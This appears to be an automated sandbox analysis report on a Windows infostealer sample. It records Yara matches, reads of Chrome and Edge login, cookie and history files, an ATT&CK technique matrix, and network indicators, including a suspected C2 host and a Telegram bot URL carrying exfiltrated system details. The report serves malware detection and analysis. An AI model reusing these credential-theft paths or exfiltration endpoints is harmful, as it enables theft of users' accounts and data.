                Source: Yara matchFile source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTR
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol11
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager31
                Security Software Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS31
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets2
                Process Discovery
                SSHKeylogging15
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe50%ReversingLabsWin32.Infostealer.ClipBanker
                173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe100%AviraHEUR/AGEN.1305924
                173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://sws.swpushroller.eu/swsk/P4.php0%Avira URL Cloudsafe
                http://sws.swpushroller.eu0%Avira URL Cloudsafe
                http://sws.swpushroller.eu/swsk/api.php0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.97.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    sws.swpushroller.eu
                    141.98.10.88
                    truefalse
                      unknown
                      checkip.dyndns.com
                      193.122.6.168
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/173.254.250.72false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2011/11/2024%20/%2005:56:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                http://sws.swpushroller.eu/swsk/P4.phpfalse
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000297F000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtab173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/173.254.250.72$173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/lB173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000297A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.office.com/H173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://sws.swpushroller.eu173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000290C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://checkip.dyndns.org173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.000000000379C000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003948000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003B75000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003970000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.000000000379C000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003948000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003B75000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003970000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=en173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
